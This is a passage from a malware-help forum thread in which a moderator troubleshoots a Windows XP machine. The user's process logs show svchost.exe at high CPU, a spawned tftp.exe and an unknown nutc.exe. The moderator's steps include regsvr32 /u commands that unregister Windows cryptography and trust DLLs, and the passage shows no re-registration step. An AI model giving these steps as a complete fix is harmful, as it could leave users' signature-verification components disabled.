user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winsta.dll Winstation Library Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wtsapi32.dll Windows Terminal Server SDK APIs Microsoft Corporation 5.01.2600.1106

log 2
Process PID CPU Description Company Name
System Idle Process 0 37.25
Interrupts n/a 2.94 Hardware Interrupts
DPCs n/a Deferred Procedure Calls
System 4 2.94
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 436 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 480 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 800 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1068 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1192 AVG Alert Manager GRISOFT, s.r.o.
AVGW.EXE 1884 45.10 AVG 7.0 GRISOFT, s.r.o.
AVGUPSVC.EXE 1244 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1316 ewido control ewido networks
NVSVC32.EXE 1412 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1500 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1636 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 492 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1324 HP
Directcd.exe 1332 DirectCD Application Roxio
AVGCC.EXE 1620 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1696 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1736
pgaccount.exe 1856 pgaccount DiamondCS
procguard.exe 160 GUI Aspect of ProcessGuard DiamondCS
RUNDLL32.EXE 184 Run a DLL as an App Microsoft Corporation
procexp.exe 1352 11.76 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 652

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000

log 3
rocess PID CPU Description Company Name
System Idle Process 0
Interrupts n/a 1.21 Hardware Interrupts
DPCs n/a 0.88 Deferred Procedure Calls
System 4 3.36
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 436 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 480 0.07 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 95.18 Generic Host Process for Win32 Services Microsoft Corporation
tftp.exe 764 Trivial File Transfer Protocol App Microsoft Corporation
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 740 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 800 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1068 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1192 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1244 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
ewidoctrl.exe 1316 ewido control ewido networks
NVSVC32.EXE 1412 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1500 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1636 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 492 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 0.44 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1324 HP
Directcd.exe 1332 DirectCD Application Roxio
AVGCC.EXE 1620 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1696 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1736
pgaccount.exe 1856 pgaccount DiamondCS
procguard.exe 160 GUI Aspect of ProcessGuard DiamondCS
firefox.exe 484 Firefox Mozilla
RUNDLL32.EXE 184 Run a DLL as an App Microsoft Corporation
procexp.exe 1352 0.37 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 652

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000
  • 0

Advertisements


#206
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Errm. Dumb question probably.
Did you download FireFox from the Mozilla site?
Or did you get it from somewhere else?

In Process Explorer you can click View > Show Fractional CPU

Can you tell me which one is extremely high when your computer freezes up?

Regards,
  • 0

#207
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello
no such thing as a dumb question especially here,
i got firefox from a cd rom included in a magazine called netguide, i have downloaded the update form the mozilla site, dont know if this is the information you require but the last log, log3 is the one that shows the high percentage of usage when computer freezes i managed to single it out when i was using computer, is this the information you needed?
Cheers
  • 0

#208
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Not paying close enough attention. Sorry.

This is what I was looking for:
SVCHOST.EXE 652 95.18 Generic Host Process for Win32 Services Microsoft Corporation

That is the process using up all the resources.

I see no dll's that don't belong there, but I noticed one missing. That may be due to the SP

Can you try this:

Click Start > Run > cmd > OK

In the command prompt type these commands, each line followed by Enter:

regsvr32 /u softpub.dll
regsvr32 /u wintrust.dll
regsvr32 /u initpki.dll
regsvr32 /u dssenh.dll
regsvr32 /u rsaenh.dll
regsvr32 /u gpkcsp.dll
regsvr32 /u sccbase.dll
regsvr32 /u slbcsp.dll
regsvr32 /u mssip32.dll
regsvr32 /u cryptdlg.dll


You may have to put ProcessGuard in Learning mode to perform this successfully, so please stay offline untill you are done and reboot.

Regards,
  • 0

#209
duglartis

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hello have done that had one lock up since wasnt fast enough to get a logfile but did save under svchost 652after reboot hope this helps, it seems to pop up "trivial file transfer" hope this is of somehelp also had a svchost 732 pop up which caused the "TFT" to activate and lock up but it has since disappeared
thanks for your help
Process PID CPU Description Company Name
System Idle Process 0 91.18
Interrupts n/a 0.98 Hardware Interrupts
DPCs n/a Deferred Procedure Calls
System 4
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 440 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 484 0.98 Services and Controller app Microsoft Corporation
SVCHOST.EXE 652 Generic Host Process for Win32 Services Microsoft Corporation
nutc.exe 460
SVCHOST.EXE 676 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 732 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 776 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1052 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1176 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1188 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1236 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
NVSVC32.EXE 1388 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1528 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1620 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 496 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1008 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1292 HP
Directcd.exe 1300 DirectCD Application Roxio
AVGCC.EXE 1488 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1544 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1608
pgaccount.exe 1864 pgaccount DiamondCS
procguard.exe 1980 GUI Aspect of ProcessGuard DiamondCS
FIREFOX.EXE 1352 Firefox Mozilla
RUNDLL32.EXE 1984 Run a DLL as an App Microsoft Corporation
procexp.exe 848 6.86 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 652

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
apphelp.dll Application Compatibility Client Library Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000
  • 0

#210
Metallica

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 31,942 posts
Hmm. Can you do a find files for nutc.exe ?

Let me know where you find, what it says under properties and what http://virusscan.jotti.org/ has to say about it.

Regards,
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP